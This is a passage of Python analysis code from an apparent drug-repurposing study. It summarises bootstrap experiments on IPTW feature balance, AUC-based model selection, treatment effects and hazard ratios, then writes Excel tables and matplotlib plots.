trainval_nsmd_testauc = dftmp.iloc[0, dftmp.columns.get_loc('test_auc')]
# 8. FINAL: selected by trainval_n_unbalanced_feat_iptw + val AUC
dftmp = df.sort_values(by=['trainval_n_unbalanced_feat_iptw', 'val_auc'], ascending=[True, False])
trainval_final_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('trainval_n_unbalanced_feat_iptw')]
trainval_final_valauc = dftmp.iloc[0, dftmp.columns.get_loc('val_auc')]
trainval_final_finalnsmd = dftmp.iloc[0, dftmp.columns.get_loc('all_n_unbalanced_feat_iptw')]
trainval_final_testnauc = dftmp.iloc[0, dftmp.columns.get_loc('test_auc')]
results.append(["{}_S{}D200C{}_{}".format(drug, seed, ctrl_type, model), ctrl_type,
val_auc, val_auc_nsmd, val_auc_testauc,
val_maxsmd, val_maxsmd_nsmd, val_maxsmd_testauc,
val_nsmd, val_nsmd_nsmd, val_nsmd_testauc,
train_maxsmd, train_maxsmd_nsmd, train_maxsmd_testauc,
train_nsmd, train_nsmd_nsmd, train_nsmd_testauc,
trainval_maxsmd, trainval_maxsmd_nsmd, trainval_maxsmd_testauc,
trainval_nsmd, trainval_nsmd_nsmd, trainval_nsmd_testauc,
trainval_final_nsmd, trainval_final_valauc, trainval_final_finalnsmd,
trainval_final_testnauc,
])
rdf = pd.DataFrame(results, columns=['fname', 'ctrl_type',
"val_auc", "val_auc_nsmd", "val_auc_testauc",
"val_maxsmd", "val_maxsmd_nsmd", "val_maxsmd_testauc",
"val_nsmd", "val_nsmd_nsmd", "val_nsmd_testauc",
"train_maxsmd", "train_maxsmd_nsmd", "train_maxsmd_testauc",
"train_nsmd", "train_nsmd_nsmd", "train_nsmd_testauc",
"trainval_maxsmd", "trainval_maxsmd_nsmd", "trainval_maxsmd_testauc",
"trainval_nsmd", "trainval_nsmd_nsmd", "trainval_nsmd_testauc",
"trainval_final_nsmd", "trainval_final_valauc", "trainval_final_finalnsmd",
"trainval_final_testnauc",
])
rdf.to_csv(dirname + 'results/' + drug + '_model_selection.csv')
for t in ['random', 'atc', 'all']:
# fig = plt.figure(figsize=(20, 15))
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(20, 18))
if t != 'all':
idx = rdf['ctrl_type'] == t
else:
idx = rdf['ctrl_type'].notna()
boxplot = rdf[idx].boxplot(column=["val_auc_nsmd", "val_maxsmd_nsmd", "val_nsmd_nsmd", "train_maxsmd_nsmd",
"train_nsmd_nsmd", "trainval_maxsmd_nsmd", "trainval_nsmd_nsmd",
"trainval_final_finalnsmd"], rot=25, fontsize=15, ax=ax1)
ax1.axhline(y=5, color='r', linestyle='-')
boxplot.set_title("{}-{}_S{}D200C{}_{}".format(drug, drug_name.get(drug)[:30], '0-19', t, model), fontsize=25)
# plt.xlabel("Model selection methods", fontsize=15)
ax1.set_ylabel("#unbalanced_feat_iptw of boostrap experiments", fontsize=20)
# fig.savefig(dirname + 'results/' + drug + '_model_selection_boxplot-{}-allnsmd.png'.format(t))
# plt.show()
# fig = plt.figure(figsize=(20, 15))
boxplot = rdf[idx].boxplot(column=["val_auc_testauc", "val_maxsmd_testauc", "val_nsmd_testauc",
"train_maxsmd_testauc", "train_nsmd_testauc", "trainval_maxsmd_testauc",
"trainval_nsmd_testauc", 'trainval_final_testnauc'], rot=25, fontsize=15,
ax=ax2)
# plt.axhline(y=0.5, color='r', linestyle='-')
# boxplot.set_title("{}-{}_S{}D200C{}_{}".format(drug, drug_name.get(drug), '0-19', t, model), fontsize=25)
ax2.set_xlabel("Model selection methods", fontsize=20)
ax2.set_ylabel("test_auc of boostrap experiments", fontsize=20)
plt.tight_layout()
fig.savefig(dirname + 'results/' + drug + '_model_selection_boxplot-{}.png'.format(t))
# plt.clf()
plt.close()
print()
def results_model_selection_for_ml_step2(cohort_dir_name, model, drug_name):
cohort_size = pickle.load(open(r'../ipreprocess/output_marketscan/{}/cohorts_size.pkl'.format(cohort_dir_name), 'rb'))
name_cnt = sorted(cohort_size.items(), key=lambda x: x[1], reverse=True)
drug_list_all = [drug.split('.')[0] for drug, cnt in name_cnt]
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
drug_in_dir = set([x for x in os.listdir(dirname) if x.isdigit()])
drug_list = [x for x in drug_list_all if x in drug_in_dir] # in order
check_and_mkdir(dirname + 'results/')
writer = pd.ExcelWriter(dirname + 'results/summarized_model_selection_{}.xlsx'.format(model), engine='xlsxwriter')
for t in ['random', 'atc', 'all']:
results = []
for drug in drug_list:
rdf = pd.read_csv(dirname + 'results/' + drug + '_model_selection.csv')
if t != 'all':
idx = rdf['ctrl_type'] == t
else:
idx = rdf['ctrl_type'].notna()
r = [drug, drug_name.get(drug, '')]
col_name = ['drug', 'drug_name']
# zip(["val_auc_nsmd", "val_maxsmd_nsmd", "val_nsmd_nsmd", "train_maxsmd_nsmd",
# "train_nsmd_nsmd", "trainval_maxsmd_nsmd", "trainval_nsmd_nsmd",
# "trainval_final_finalnsmd"],
# ["val_auc_testauc", "val_maxsmd_testauc", "val_nsmd_testauc",
# "train_maxsmd_testauc", "train_nsmd_testauc", "trainval_maxsmd_testauc",
# "trainval_nsmd_testauc", 'trainval_final_testnauc'])
for c1, c2 in zip(["val_auc_nsmd", "val_maxsmd_nsmd", "trainval_final_finalnsmd"],
["val_auc_testauc", "val_maxsmd_testauc", 'trainval_final_testnauc']):
nsmd = rdf.loc[idx, c1]
auc = rdf.loc[idx, c2]
nsmd_med = IQR(nsmd)[0]
nsmd_iqr = IQR(nsmd)[1:]
nsmd_mean = nsmd.mean()
nsmd_mean_ci, nsmd_mean_std = bootstrap_mean_ci(nsmd, alpha=0.05)
success_rate = (nsmd <= MAX_NO_UNBALANCED_FEATURE).mean()
success_rate_ci, success_rate_std = bootstrap_mean_ci(nsmd <= MAX_NO_UNBALANCED_FEATURE, alpha=0.05)
auc_med = IQR(auc)[0]
auc_iqr = IQR(auc)[1:]
auc_mean = auc.mean()
auc_mean_ci, auc_mean_std = bootstrap_mean_ci(auc, alpha=0.05)
r.extend([nsmd_med, nsmd_iqr,
nsmd_mean, nsmd_mean_ci, nsmd_mean_std,
success_rate, success_rate_ci, success_rate_std,
auc_med, auc_iqr, auc_mean, auc_mean_ci, auc_mean_std])
col_name.extend(
["nsmd_med-" + c1, "nsmd_iqr-" + c1, "nsmd_mean-" + c1, "nsmd_mean_ci-" + c1, "nsmd_mean_std-" + c1,
"success_rate-" + c1, "success_rate_ci-" + c1, "success_rate_std-" + c1,
"auc_med-" + c2, "auc_iqr-" + c2, "auc_mean-" + c2, "auc_mean_ci-" + c2, "auc_mean_std-" + c2])
x = np.array(rdf.loc[idx, "trainval_final_finalnsmd"] <= MAX_NO_UNBALANCED_FEATURE, dtype=np.float)
y1 = np.array(rdf.loc[idx, "val_auc_nsmd"] <= MAX_NO_UNBALANCED_FEATURE, dtype=np.float)
y2 = np.array(rdf.loc[idx, "val_maxsmd_nsmd"] <= MAX_NO_UNBALANCED_FEATURE, dtype=np.float)
p1, test_orig1 = bootstrap_mean_pvalue_2samples(x, y1)
p2, test_orig2 = bootstrap_mean_pvalue_2samples(x, y2)
p3, test_orig3 = bootstrap_mean_pvalue_2samples(y1, y2)
r.extend([p1, test_orig1[1], p2, test_orig2[1], p3, test_orig3[1]])
col_name.extend(
['pboot-succes-final-vs-auc', 'p-succes-final-vs-auc',
'pboot-succes-final-vs-maxsmd', 'p-succes-final-vs-maxsmd',
'pboot-succes-auc-vs-maxsmd', 'p-succes-auc-vs-maxsmd'])
results.append(r)
df = pd.DataFrame(results, columns=col_name)
df.to_excel(writer, sheet_name=t)
writer.save()
print()
def results_model_selection_for_ml_step2More(cohort_dir_name, model, drug_name):
cohort_size = pickle.load(open(r'../ipreprocess/output_marketscan/{}/cohorts_size.pkl'.format(cohort_dir_name), 'rb'))
name_cnt = sorted(cohort_size.items(), key=lambda x: x[1], reverse=True)
drug_list_all = [drug.split('.')[0] for drug, cnt in name_cnt]
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
drug_in_dir = set([x for x in os.listdir(dirname) if x.isdigit()])
drug_list = [x for x in drug_list_all if x in drug_in_dir] # in order
check_and_mkdir(dirname + 'results/')
writer = pd.ExcelWriter(dirname + 'results/summarized_model_selection_{}-More.xlsx'.format(model),
engine='xlsxwriter')
for t in ['random', 'atc', 'all']:
results = []
for drug in drug_list:
rdf = pd.read_csv(dirname + 'results/' + drug + '_model_selection.csv')
if t != 'all':
idx = rdf['ctrl_type'] == t
else:
idx = rdf['ctrl_type'].notna()
r = [drug, drug_name.get(drug, '')]
col_name = ['drug', 'drug_name']
for c1, c2 in zip(
["val_auc_nsmd", "val_maxsmd_nsmd", "val_nsmd_nsmd", "train_maxsmd_nsmd",
"train_nsmd_nsmd", "trainval_maxsmd_nsmd", "trainval_nsmd_nsmd", "trainval_final_finalnsmd"],
["val_auc_testauc", "val_maxsmd_testauc", "val_nsmd_testauc", "train_maxsmd_testauc",
"train_nsmd_testauc", "trainval_maxsmd_testauc", "trainval_nsmd_testauc",
'trainval_final_testnauc']):
# for c1, c2 in zip(["val_auc_nsmd", "val_maxsmd_nsmd", "val_nsmd_nsmd", "train_maxsmd_nsmd", "train_nsmd_nsmd", "trainval_final_finalnsmd"],
# ["val_auc_testauc", "val_maxsmd_testauc", 'trainval_final_testnauc']):
nsmd = rdf.loc[idx, c1]
auc = rdf.loc[idx, c2]
nsmd_med = IQR(nsmd)[0]
nsmd_iqr = IQR(nsmd)[1:]
nsmd_mean = nsmd.mean()
nsmd_mean_ci, nsmd_mean_std = bootstrap_mean_ci(nsmd, alpha=0.05)
success_rate = (nsmd <= MAX_NO_UNBALANCED_FEATURE).mean()
success_rate_ci, success_rate_std = bootstrap_mean_ci(nsmd <= MAX_NO_UNBALANCED_FEATURE, alpha=0.05)
auc_med = IQR(auc)[0]
auc_iqr = IQR(auc)[1:]
auc_mean = auc.mean()
auc_mean_ci, auc_mean_std = bootstrap_mean_ci(auc, alpha=0.05)
r.extend([nsmd_med, nsmd_iqr,
nsmd_mean, nsmd_mean_ci, nsmd_mean_std,
success_rate, success_rate_ci, success_rate_std,
auc_med, auc_iqr, auc_mean, auc_mean_ci, auc_mean_std])
col_name.extend(
["nsmd_med-" + c1, "nsmd_iqr-" + c1, "nsmd_mean-" + c1, "nsmd_mean_ci-" + c1, "nsmd_mean_std-" + c1,
"success_rate-" + c1, "success_rate_ci-" + c1, "success_rate_std-" + c1,
"auc_med-" + c2, "auc_iqr-" + c2, "auc_mean-" + c2, "auc_mean_ci-" + c2, "auc_mean_std-" + c2])
x = np.array(rdf.loc[idx, "trainval_final_finalnsmd"] <= MAX_NO_UNBALANCED_FEATURE, dtype=np.float)
y1 = np.array(rdf.loc[idx, "val_auc_nsmd"] <= MAX_NO_UNBALANCED_FEATURE, dtype=np.float)
y2 = np.array(rdf.loc[idx, "val_maxsmd_nsmd"] <= MAX_NO_UNBALANCED_FEATURE, dtype=np.float)
p1, test_orig1 = bootstrap_mean_pvalue_2samples(x, y1)
p2, test_orig2 = bootstrap_mean_pvalue_2samples(x, y2)
p3, test_orig3 = bootstrap_mean_pvalue_2samples(y1, y2)
r.extend([p1, test_orig1[1], p2, test_orig2[1], p3, test_orig3[1]])
col_name.extend(
['pboot-succes-final-vs-auc', 'p-succes-final-vs-auc',
'pboot-succes-final-vs-maxsmd', 'p-succes-final-vs-maxsmd',
'pboot-succes-auc-vs-maxsmd', 'p-succes-auc-vs-maxsmd'])
col = ['val_auc_nsmd', 'val_maxsmd_nsmd', 'val_nsmd_nsmd',
'train_maxsmd_nsmd', 'train_nsmd_nsmd',
'trainval_maxsmd_nsmd', 'trainval_nsmd_nsmd'] # ,'success_rate-trainval_final_finalnsmd']
for c in col:
y = np.array(rdf.loc[idx, c] <= MAX_NO_UNBALANCED_FEATURE, dtype=np.float)
p, test_orig = bootstrap_mean_pvalue_2samples(x, y)
r.append(test_orig[1])
col_name.append('p-succes-fvs-' + c)
results.append(r)
df = pd.DataFrame(results, columns=col_name)
df.to_excel(writer, sheet_name=t)
writer.save()
print()
def results_ATE_for_ml(cohort_dir_name, model, niter=50):
cohort_size = pickle.load(open(r'../ipreprocess/output_marketscan/{}/cohorts_size.pkl'.format(cohort_dir_name), 'rb'))
name_cnt = sorted(cohort_size.items(), key=lambda x: x[1], reverse=True)
drug_list_all = [drug.split('.')[0] for drug, cnt in name_cnt]
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
drug_in_dir = set([x for x in os.listdir(dirname) if x.isdigit()])
drug_list = [x for x in drug_list_all if x in drug_in_dir] # in order
check_and_mkdir(dirname + 'results/')
for drug in drug_list:
results = []
for ctrl_type in ['random', 'atc']:
for seed in range(0, niter):
fname = dirname + drug + "/{}_S{}D200C{}_{}".format(drug, seed, ctrl_type, model)
try:
df = pd.read_csv(fname + '_results.csv')
except:
print('No file exisits: ', fname + '_results.csv')
r = df.loc[3, :]
for c in ["KM_time_points", "KM1_original", "KM0_original", "KM1-0_original",
"KM1_IPTW", "KM0_IPTW", "KM1-0_IPTW"]:
r.loc[c] = stringlist_2_list(r.loc[c])[-1]
r = pd.Series(["{}_S{}D200C{}_{}".format(drug, seed, ctrl_type, model), ctrl_type],
index=['fname', 'ctrl_type']).append(r)
results.append(r)
rdf = pd.DataFrame(results)
rdf.to_excel(dirname + 'results/' + drug + '_results.xlsx')
print('Done')
def results_ATE_for_ml_step2(cohort_dir_name, model, drug_name):
cohort_size = pickle.load(open(r'../ipreprocess/output_marketscan/{}/cohorts_size.pkl'.format(cohort_dir_name), 'rb'))
name_cnt = sorted(cohort_size.items(), key=lambda x: x[1], reverse=True)
drug_list_all = [drug.split('.')[0] for drug, cnt in name_cnt]
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
drug_in_dir = set([x for x in os.listdir(dirname) if x.isdigit()])
drug_list = [x for x in drug_list_all if x in drug_in_dir] # in order
check_and_mkdir(dirname + 'results/')
writer = pd.ExcelWriter(dirname + 'results/summarized_IPTW_ATE_{}.xlsx'.format(model), engine='xlsxwriter')
for t in ['random', 'atc', 'all']:
results = []
for drug in drug_list:
rdf = pd.read_excel(dirname + 'results/' + drug + '_results.xlsx')
if t != 'all':
idx_all = (rdf['ctrl_type'] == t)
else:
idx_all = (rdf['ctrl_type'].notna())
# Only select balanced trial
idx = idx_all & (rdf['n_unbalanced_feature_IPTW'] <= MAX_NO_UNBALANCED_FEATURE)
print('drug: ', drug, drug_name.get(drug, ''), t, 'support:', idx.sum())
r = [drug, drug_name.get(drug, ''), idx_all.sum(), idx.sum()]
col_name = ['drug', 'drug_name', 'niters', 'support']
for c in ["n_treat", "n_ctrl", "n_feature"]: # , 'HR_IPTW', 'HR_IPTW_CI'
nv = rdf.loc[idx, c]
nv_mean = nv.mean()
r.append(nv_mean)
col_name.append(c)
nv = rdf.loc[idx_all, c]
nv_mean = nv.mean()
r.append(nv_mean)
col_name.append(c + '-uab')
for c in ["n_unbalanced_feature", "n_unbalanced_feature_IPTW"]: # , 'HR_IPTW', 'HR_IPTW_CI'
nv = rdf.loc[idx, c]
if len(nv) > 0:
med = IQR(nv)[0]
iqr = IQR(nv)[1:]
mean = nv.mean()
mean_ci, _ = bootstrap_mean_ci(nv, alpha=0.05)
r.extend([med, iqr, mean, mean_ci])
else:
r.extend([np.nan, np.nan, np.nan, np.nan])
col_name.extend(["med-" + c, "iqr-" + c, "mean-" + c, "mean_ci-" + c])
nv = rdf.loc[idx_all, c]
if len(nv) > 0:
med = IQR(nv)[0]
iqr = IQR(nv)[1:]
mean = nv.mean()
mean_ci, _ = bootstrap_mean_ci(nv, alpha=0.05)
r.extend([med, iqr, mean, mean_ci])
else:
r.extend([np.nan, np.nan, np.nan, np.nan])
col_name.extend(
["med-" + c + '-uab', "iqr-" + c + '-uab', "mean-" + c + '-uab', "mean_ci-" + c + '-uab'])
for c in ["ATE_original", "ATE_IPTW", "KM1-0_original", "KM1-0_IPTW", 'HR_ori', 'HR_IPTW']:
if c not in rdf.columns:
continue
nv = rdf.loc[idx, c]
if len(nv) > 0:
med = IQR(nv)[0]
iqr = IQR(nv)[1:]
mean = nv.mean()
mean_ci, _ = bootstrap_mean_ci(nv, alpha=0.05)
if 'HR' in c:
p, _ = bootstrap_mean_pvalue(nv, expected_mean=1)
else:
p, _ = bootstrap_mean_pvalue(nv, expected_mean=0)
r.extend([med, iqr, mean, mean_ci, p])
else:
r.extend([np.nan, np.nan, np.nan, np.nan, np.nan])
col_name.extend(["med-" + c, "iqr-" + c, "mean-" + c, "mean_ci-" + c, 'pvalue-' + c])
if 'HR_ori_CI' in rdf.columns:
r.append(';'.join(rdf.loc[idx, 'HR_ori_CI']))
col_name.append('HR_ori_CI')
r.append(';'.join(rdf.loc[idx, 'HR_IPTW_CI']))
col_name.append('HR_IPTW_CI')
results.append(r)
df = pd.DataFrame(results, columns=col_name)
df.to_excel(writer, sheet_name=t)
writer.save()
print()
def results_ATE_for_ml_step3_finalInfo(cohort_dir_name, model):
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
df_all = pd.read_excel(dirname + 'results/summarized_IPTW_ATE_{}.xlsx'.format(model), sheet_name=None, dtype={'drug':str})
writer = pd.ExcelWriter(dirname + 'results/summarized_IPTW_ATE_{}_finalInfo.xlsx'.format(model),
engine='xlsxwriter')
for sheet in ['random', 'atc', 'all']:
df = df_all[sheet]
# Only select drugs with selection criteria trial
# 1. minimum support set 10, may choose 20 later
# 2. p value < 0.05
idx = (df['support'] >= 10) & (df['pvalue-KM1-0_IPTW'] <= 0.05)
df_sort = df.loc[idx, :].sort_values(by=['mean-KM1-0_IPTW'], ascending=[False])
df_final = df_sort[
['drug', 'drug_name', 'niters', 'support', 'n_treat', 'n_ctrl', 'n_feature',
'mean-n_unbalanced_feature', 'mean_ci-n_unbalanced_feature',
'mean-n_unbalanced_feature_IPTW', 'mean_ci-n_unbalanced_feature_IPTW',
# 'mean-ATE_original', 'mean_ci-ATE_original', 'pvalue-ATE_original',
# 'mean-ATE_IPTW', 'mean_ci-ATE_IPTW', 'pvalue-ATE_IPTW',
# 'mean-KM1-0_original', 'mean_ci-KM1-0_original', 'pvalue-KM1-0_original',
'mean-KM1-0_IPTW', 'mean_ci-KM1-0_IPTW', 'pvalue-KM1-0_IPTW',
'mean-HR_IPTW', 'mean_ci-HR_IPTW', 'pvalue-HR_IPTW']]
df_final['n_ctrl'] = df_final['n_ctrl'].apply(
lambda x: '{:.1f}'.format(x))
df_final['mean-n_unbalanced_feature'] = df_final['mean-n_unbalanced_feature'].apply(
lambda x: '{:.1f}'.format(x))
df_final['mean_ci-n_unbalanced_feature'] = df_final['mean_ci-n_unbalanced_feature'].apply(
lambda x: stringlist_2_str(x, False, 1))
df_final['mean-n_unbalanced_feature_IPTW'] = df_final['mean-n_unbalanced_feature_IPTW'].apply(
lambda x: '{:.1f}'.format(x))
df_final['mean_ci-n_unbalanced_feature_IPTW'] = df_final['mean_ci-n_unbalanced_feature_IPTW'].apply(
lambda x: stringlist_2_str(x, False, 1))
df_final['mean-KM1-0_IPTW'] = df_final['mean-KM1-0_IPTW'].apply(
lambda x: '{:.1f}'.format(x * 100))
df_final['mean_ci-KM1-0_IPTW'] = df_final['mean_ci-KM1-0_IPTW'].apply(
lambda x: stringlist_2_str(x, True, 1))
df_final['mean-HR_IPTW'] = df_final['mean-HR_IPTW'].apply(
lambda x: '{:.2f}'.format(x))
df_final['mean_ci-HR_IPTW'] = df_final['mean_ci-HR_IPTW'].apply(
lambda x: stringlist_2_str(x, False, 2))
df_final.to_excel(writer, sheet_name=sheet)
writer.save()
print('Done results_ATE_for_ml_step3_finalInfo')
def combine_ate_final_LR_with(cohort_dir_name, model):
dirname = r'output_marketscan/{}/LR/'.format(cohort_dir_name)
df_lr = pd.read_excel(dirname + 'results/summarized_IPTW_ATE_{}_finalInfo.xlsx'.format('LR'), sheet_name=None,
dtype=str)
df_other = pd.read_excel(r'output_marketscan/{}/{}/'.format(cohort_dir_name, model) +
'results/summarized_IPTW_ATE_{}_finalInfo.xlsx'.format(model), sheet_name=None, dtype=str)
writer = pd.ExcelWriter(dirname + 'results/summarized_IPTW_ATE_LR_finalInfo_cat_{}.xlsx'.format(model),
engine='xlsxwriter')
writer2 = pd.ExcelWriter(dirname + 'results/summarized_IPTW_ATE_LR_finalInfo_outerjoin_{}.xlsx'.format(model),
engine='xlsxwriter')
col_name = ['drug', 'Drug', 'Model', 'niters', 'Support', 'Treat', 'Ctrl',
'n_feature', ' Unbalanced', 'Unbalanced IPTW', 'KM', 'HR']
def return_select_content(key, row, null_model=''):
data = [key, ]
col1 = ['drug_name', 'Model', 'niters', 'support', 'n_treat', 'n_ctrl',
'n_feature', 'mean-n_unbalanced_feature', 'mean-n_unbalanced_feature_IPTW']
if null_model:
for c in col1:
data.append(row[c])
data[2] = null_model.upper()
data[4] = 0
data[5] = data[6] = data[7] = data[8] = data[9] = np.nan
data.append(np.nan)
data.append(np.nan)
else:
for c in col1:
data.append(row[c])
data.append(row['mean-KM1-0_IPTW'] + ' (' + row['mean_ci-KM1-0_IPTW'] + ')')
data.append(row['mean-HR_IPTW'] + ' (' + row['mean_ci-HR_IPTW'] + ')')
return data
for sheet in ['random', 'atc', 'all']:
df1 = df_lr[sheet]
df1['Model'] = 'lr'
df2 = df_other[sheet]
df2['Model'] = 'lstm'
df_outer = df1.join(df2.set_index('drug'), lsuffix='', rsuffix='_{}'.format(model), on='drug', how='outer')
df_outer.to_excel(writer2, sheet_name=sheet)
df1 = df1.set_index('drug')
df2 = df2.set_index('drug')
data = []
for key, row in df1.iterrows():
data.append(return_select_content(key, row))
if key in df2.index:
data.append(return_select_content(key, df2.loc[key, :]))
else:
data.append(return_select_content(key, row, null_model=model))
df_final = pd.DataFrame(data=data, columns=col_name)
df_final.to_excel(writer, sheet_name=sheet)
writer.save()
writer2.save()
print('Done results_ATE_for_ml_step3_finalInfo')
def check_drug_name_code():
df = pd.read_excel(r'../data/repurposed_AD_under_trials_20200227.xlsx', dtype=str)
rx_df = pd.read_csv(r'../ipreprocess/output/save_cohort_all_loose/cohort_all_name_size_positive_loose.csv',
index_col='cohort_name', dtype=str)
gpi_df = pd.read_csv(r'../ipreprocess/output_marketscan/save_cohort_all_loose/cohort_all_name_size_positive.csv',
index_col='cohort_name', dtype=str)
df['rx_drug_name'] = ''
df['rx_n_patients'] = ''
df['rx_n_pos'] = ''
df['rx_pos_ratio'] = ''
df['gpi_drug_name'] = ''
df['gpi_n_patients'] = ''
df['gpi_n_pos'] = ''
df['gpi_pos_ratio'] = ''
for index, row in df.iterrows():
rx = row['rxcui']
gpi = row['gpi']
# print(index, row)
if pd.notna(rx):
rx = [x + '.pkl' for x in re.split('[,;+]', rx)]
else:
rx = []
if pd.notna(gpi):
gpi = [x + '.pkl' for x in re.split('[,;+]', gpi)]
else:
gpi = []
for r in rx:
if r in rx_df.index:
df.loc[index, 'rx_drug_name'] += ('+' + rx_df.loc[r, 'drug_name'])
df.loc[index, 'rx_n_patients'] += ('+' + rx_df.loc[r, 'n_patients'])
df.loc[index, 'rx_n_pos'] += ('+' + rx_df.loc[r, 'n_pos'])
df.loc[index, 'rx_pos_ratio'] += ('+' + rx_df.loc[r, 'pos_ratio'])
for r in gpi:
if r in gpi_df.index:
df.loc[index, 'gpi_drug_name'] += ('+' + gpi_df.loc[r, 'drug_name'])
df.loc[index, 'gpi_n_patients'] += ('+' + gpi_df.loc[r, 'n_patients'])
df.loc[index, 'gpi_n_pos'] += ('+' + gpi_df.loc[r, 'n_pos'])
df.loc[index, 'gpi_pos_ratio'] += ('+' + gpi_df.loc[r, 'pos_ratio'])
df.to_excel(r'../data/repurposed_AD_under_trials_20200227-CHECK.xlsx')
return df
def bar_plot_model_selection(cohort_dir_name, model, contrl_type='random', dump=True, colorful=True):
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
dfall = pd.read_excel(dirname + 'results/summarized_model_selection_{}.xlsx'.format(model), sheet_name=contrl_type)
idx = dfall['success_rate-trainval_final_finalnsmd'] >= MIN_SUCCESS_RATE # 0.1
idx_auc = dfall['success_rate-val_auc_nsmd'] >= MIN_SUCCESS_RATE # 0.1
idx_smd = dfall['success_rate-val_maxsmd_nsmd'] >= MIN_SUCCESS_RATE # 0.1
print('Total drug trials: ', len(idx))
print(r"#df['success_rate-trainval_final_finalnsmd'] > 0: ", idx.sum(), '({:.2f}%)'.format(idx.mean() * 100))
print(r"#df['success_rate-val_auc_nsmd'] > 0: ", idx_auc.sum(), '({:.2f}%)'.format(idx_auc.mean() * 100))
print(r"#df['success_rate-val_maxsmd_nsmd'] > 0: ", idx_smd.sum(), '({:.2f}%)'.format(idx_smd.mean() * 100))
df = dfall.loc[idx, :].sort_values(by=['success_rate-trainval_final_finalnsmd'], ascending=[False])
# df['nsmd_mean_ci-val_auc_nsmd']
N = len(df)
top_1 = df.loc[:, 'success_rate-val_auc_nsmd'] # * 100
top_1_ci = np.array(
df.loc[:, 'success_rate_ci-val_auc_nsmd'].apply(lambda x: stringlist_2_list(x)).to_list()) # *100
# top_1_ci = df.loc[:, 'success_rate_std-val_auc_nsmd']
top_2 = df.loc[:, 'success_rate-val_maxsmd_nsmd'] # * 100
top_2_ci = np.array(
df.loc[:, 'success_rate_ci-val_maxsmd_nsmd'].apply(lambda x: stringlist_2_list(x)).to_list()) # *100
# top_2_ci = df.loc[:, 'success_rate_std-val_maxsmd_nsmd']
top_3 = df.loc[:, 'success_rate-trainval_final_finalnsmd'] # * 100
top_3_ci = np.array(
df.loc[:, 'success_rate_ci-trainval_final_finalnsmd'].apply(lambda x: stringlist_2_list(x)).to_list()) # *100
# top_3_ci = df.loc[:, 'success_rate_std-trainval_final_finalnsmd']
pauc = np.array(df.loc[:, "p-succes-final-vs-auc"])
psmd = np.array(df.loc[:, "p-succes-final-vs-maxsmd"])
paucsmd = np.array(df.loc[:, "p-succes-auc-vs-maxsmd"])
xlabels = df.loc[:, 'drug_name']
# xlabels = df.loc[:, 'drug_name'].apply(lambda x : min(x.split('/'), key=str))
xlabels = [s[:18] for s in xlabels]
width = 0.3 # 0.45 # the width of the bars
ind = np.arange(N) * width * 4 # the x locations for the groups
colors = ['#FAC200', '#82A2D3', '#F65453']
fig, ax = plt.subplots(figsize=(40, 8))
error_kw = {'capsize': 3, 'capthick': 1, 'ecolor': 'black'}
# plt.ylim([0, 1.05])
rects1 = ax.bar(ind, top_1, width, yerr=[top_1 - top_1_ci[:, 0], top_1_ci[:, 1] - top_1], error_kw=error_kw,
color=colors[0], edgecolor=None) # , edgecolor='b' "black"
rects2 = ax.bar(ind + width, top_2, width, yerr=[top_2 - top_2_ci[:, 0], top_2_ci[:, 1] - top_2], error_kw=error_kw,
color=colors[1], edgecolor=None)
rects3 = ax.bar(ind + 2 * width, top_3, width, yerr=[top_3 - top_3_ci[:, 0], top_3_ci[:, 1] - top_3],
error_kw=error_kw, color=colors[2], edgecolor=None) # , hatch='.')
# rects1 = ax.bar(ind, top_1, width, yerr=[top_1_ci, top_1_ci], error_kw=error_kw,
# color='#FAC200', edgecolor="black") # , edgecolor='b'
# rects2 = ax.bar(ind + width, top_2, width, yerr=[top_2_ci, top_2_ci], error_kw=error_kw,
# color='#82A2D3', edgecolor="black")
# rects3 = ax.bar(ind + 2 * width, top_3, width, yerr=[top_3_ci, top_3_ci],
# error_kw=error_kw, color='#F65453', edgecolor="black") # , hatch='.')
ax.set_xticks(ind + width)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_visible(False)
# ax.spines['bottom'].set_color('#DDDDDD')
ax.set_axisbelow(True)
ax.yaxis.set_minor_locator(tck.AutoMinorLocator())
ax.yaxis.grid(True, color='#EEEEEE', which='both')
ax.xaxis.grid(False)
ax.set_xticklabels(xlabels, fontsize=20, rotation=45, ha='right')
ax.tick_params(axis='both', which='major', labelsize=20)
ax.set_xlabel("Drug Trials", fontsize=25)
ax.set_ylabel("Prop. of success balancing", fontsize=25) # Success Rate of Balancing
# ax.set_title(model, fontsize=25) #fontweight="bold")
# plt.axhline(y=0.5, color='#888888', linestyle='-')
def significance(val):
if val < 0.001:
return '***'
elif val < 0.01:
return '**'
elif val < 0.05:
return '*'
else:
return 'ns'
# def labelvalue(rects, val, height=None):
# for i, rect in enumerate(rects):
# if height is None:
# h = rect.get_height() * 1.03
# else:
# h = height[i] * 1.03
# ax.text(rect.get_x() + rect.get_width() / 2., h,
# significance(val[i]),
# ha='center', va='bottom', fontsize=11)
#
# labelvalue(rects1, pauc, top_1_ci[:,1])
# labelvalue(rects2, psmd, top_2_ci[:,1])
for i, rect in enumerate(rects3):
d = 0.02
y = top_3_ci[i, 1] * 1.03 # rect.get_height()
w = rect.get_width()
x = rect.get_x()
x1 = x - 2 * w
x2 = x - 1 * w
y1 = top_1_ci[i, 1] * 1.03
y2 = top_2_ci[i, 1] * 1.03
# auc v.s. final
l, r = x1, x + w
ax.plot([l, l, (l + r) / 2], [y + 2 * d, y + 3 * d, y + 3 * d], lw=1.2, c=colors[0] if colorful else 'black')
ax.plot([(l + r) / 2, r, r], [y + 3 * d, y + 3 * d, y + 2 * d], lw=1.2, c=colors[2] if colorful else 'black')
# ax.plot([x1, x1, x, x], [y+2*d, y+3*d, y+3*d, y+2*d], c='#FAC200') #c="black")
ax.text((l + r) / 2, y + 2.6 * d, significance(pauc[i]), ha='center', va='bottom', fontsize=13)
# smd v.s. final
l, r = x2 + 0.6 * w, x + w
ax.plot([l, l, (l + r) / 2], [y, y + d, y + d], lw=1.2, c=colors[1] if colorful else 'black')
ax.plot([(l + r) / 2, r, r], [y + d, y + d, y], lw=1.2, c=colors[2] if colorful else 'black')
